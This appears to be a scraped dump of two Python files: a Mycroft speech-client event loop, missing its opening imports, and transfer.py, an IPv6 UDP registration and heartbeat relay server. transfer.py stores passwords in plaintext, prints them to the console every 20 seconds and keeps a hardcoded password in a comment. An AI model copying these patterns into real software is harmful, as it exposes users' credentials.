from mycroft.configuration import ConfigurationManager
from mycroft.identity import IdentityManager
from mycroft.lock import Lock as PIDLock # Create/Support PID locking file
from mycroft.messagebus.client.ws import WebsocketClient
from mycroft.messagebus.message import Message
from mycroft.util.log import LOG
ws = None
lock = Lock()
loop = None
config = ConfigurationManager.get()
def handle_record_begin():
LOG.info("Begin Recording...")
ws.emit(Message('recognizer_loop:record_begin'))
def handle_record_end():
LOG.info("End Recording...")
ws.emit(Message('recognizer_loop:record_end'))
def handle_no_internet():
LOG.debug("Notifying enclosure of no internet connection")
ws.emit(Message('enclosure.notify.no_internet'))
def handle_wakeword(event):
LOG.info("Wakeword Detected: " + event['utterance'])
ws.emit(Message('recognizer_loop:wakeword', event))
def handle_hotword(event):
LOG.info("Hotword Detected: " + event['hotword'])
ws.emit(Message('recognizer_loop:hotword', event))
def handle_speak(event):
ws.emit(Message('speak', event))
def handle_utterance(event):
LOG.info("Utterance: " + str(event['utterances']))
ws.emit(Message('recognizer_loop:utterance', event))
def handle_speak(event):
"""
Forward speak message to message bus.
"""
ws.emit(Message('speak', event))
def handle_complete_intent_failure(event):
LOG.info("Failed to find intent.")
# TODO: Localize
data = {'utterance':
"Sorry, I didn't catch that. Please rephrase your request."}
ws.emit(Message('speak', data))
def handle_sleep(event):
loop.sleep()
def handle_wake_up(event):
loop.awaken()
def handle_mic_mute(event):
loop.mute()
def handle_mic_unmute(event):
loop.unmute()
def handle_paired(event):
IdentityManager.update(event.data)
def handle_audio_start(event):
"""
Mute recognizer loop
"""
loop.mute()
def handle_audio_end(event):
"""
Request unmute, if more sources has requested the mic to be muted
it will remain muted.
"""
loop.unmute() # restore
def handle_stop(event):
"""
Handler for mycroft.stop, i.e. button press
"""
loop.force_unmute()
def handle_open():
# TODO: Move this into the Enclosure (not speech client)
# Reset the UI to indicate ready for speech processing
EnclosureAPI(ws).reset()
def connect():
ws.run_forever()
def main():
global ws
global loop
global config
lock = PIDLock("voice")
ws = WebsocketClient()
config = ConfigurationManager.get()
ConfigurationManager.init(ws)
loop = RecognizerLoop()
loop.on('recognizer_loop:utterance', handle_utterance)
loop.on('speak', handle_speak)
loop.on('recognizer_loop:record_begin', handle_record_begin)
loop.on('recognizer_loop:wakeword', handle_wakeword)
loop.on('recognizer_loop:hotword', handle_hotword)
loop.on('recognizer_loop:speak', handle_speak)
loop.on('recognizer_loop:record_end', handle_record_end)
loop.on('recognizer_loop:no_internet', handle_no_internet)
ws.on('open', handle_open)
ws.on('complete_intent_failure', handle_complete_intent_failure)
ws.on('recognizer_loop:sleep', handle_sleep)
ws.on('recognizer_loop:wake_up', handle_wake_up)
ws.on('mycroft.mic.mute', handle_mic_mute)
ws.on('mycroft.mic.unmute', handle_mic_unmute)
ws.on("mycroft.paired", handle_paired)
ws.on('recognizer_loop:audio_output_start', handle_audio_start)
ws.on('recognizer_loop:audio_output_end', handle_audio_end)
ws.on('mycroft.stop', handle_stop)
event_thread = Thread(target=connect)
event_thread.setDaemon(True)
event_thread.start()
try:
loop.run()
except KeyboardInterrupt, e:
LOG.exception(e)
sys.exit()
if __name__ == "__main__":
main()
|
transfer.py
|
from Ipv6_stun.server import Service
import socket
from threading import Thread
import json
import time
from datetime import datetime
class Transfer:
def __init__(self,address=('127.0.0.1',9080)):
self.user_info ={}
#self.user_info={'000000':{'passward':'sdlab123','service':None,'heart_addr':None}}
self.serve=True
self.address=address
self.sock_addr=(address[0],9090)
pass
### 开启心跳端口 ###
def start_heart(self,id):
sock=socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
data = json.dumps(id).encode('utf-8')
while self.serve:
sock.sendto(data,self.sock_addr)
if 'heart_addr' in self.user_info[id]:
sock.close()
break
pass
self.user_info[id]['service']=Service(self.user_info[id]['heart_addr'])
self.user_info[id]['service'].run()
print('id:' + str(id) + ' service start success .....')
pass
### 注册sock,用来确定分配给心跳端口的地址 ###
def addr_sock(self):
addr_sock=socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
addr_sock.bind(self.sock_addr)
while self.serve:
data, address = addr_sock.recvfrom(1024)
id=json.loads(data.decode('utf-8'))
if id in self.user_info:
self.user_info[id]['heart_addr']=address
pass
pass
pass
### 维护用户登录信息,将离线的用户id删除 ###
def maintain(self):
while self.serve:
A = 1
B = 1
for id in list(self.user_info.keys()):
try:
A = len(self.user_info[id]['service'].A)
B = len(self.user_info[id]['service'].B)
except:
pass
if A == 0 and B == 0:
t1=self.user_info[id]['service'].start_time
if time.time()-t1 >18:
try:
del self.user_info[id]
print('id:' + str(id) + ' service close success .....')
except:
pass
pass
pass
############
time.sleep(2)
pass
pass
def print_info(self):
while self.serve:
now_time = datetime.now()
str_time = now_time.strftime("%Y-%m-%d %X")
print('time: '+str_time)
print('user info: ' + str(self.user_info))
time.sleep(20)
pass
pass
def sign_service(self):
sign_sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
sign_sock.bind(self.address)
while self.serve:
try:
data,address=sign_sock.recvfrom(1024)
except:
continue
info=json.loads(data.decode('utf-8'))
id=info['id']
passward=info['passward']
group=info['group']
if id not in self.user_info:
self.user_info[id]={}
self.user_info[id]['passward']=passward
self.start_heart(id)
continue
### 如果密码对不上 ###
if passward != self.user_info[id]['passward']:
data = 'passward error,change id or input the correct passward....'
data = json.dumps(data).encode('utf-8')
sign_sock.sendto(data, address)
continue
heart_addr = self.user_info[id]['heart_addr']
heart_addr = json.dumps(heart_addr).encode('utf-8')
sign_sock.sendto(heart_addr, address)
pass
def run(self):
t1 = Thread(target=self.addr_sock)
print('addr_sock start success .....')
time.sleep(0.2)
t2 = Thread(target=self.sign_service)
t3 = Thread(target=self.maintain)
print('sign_service start success .....')
t4 = Thread(target=self.print_info)
t1.start()
t2.start()
t3.start()
t4.start()
pass
def __del__(self):
pass
pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.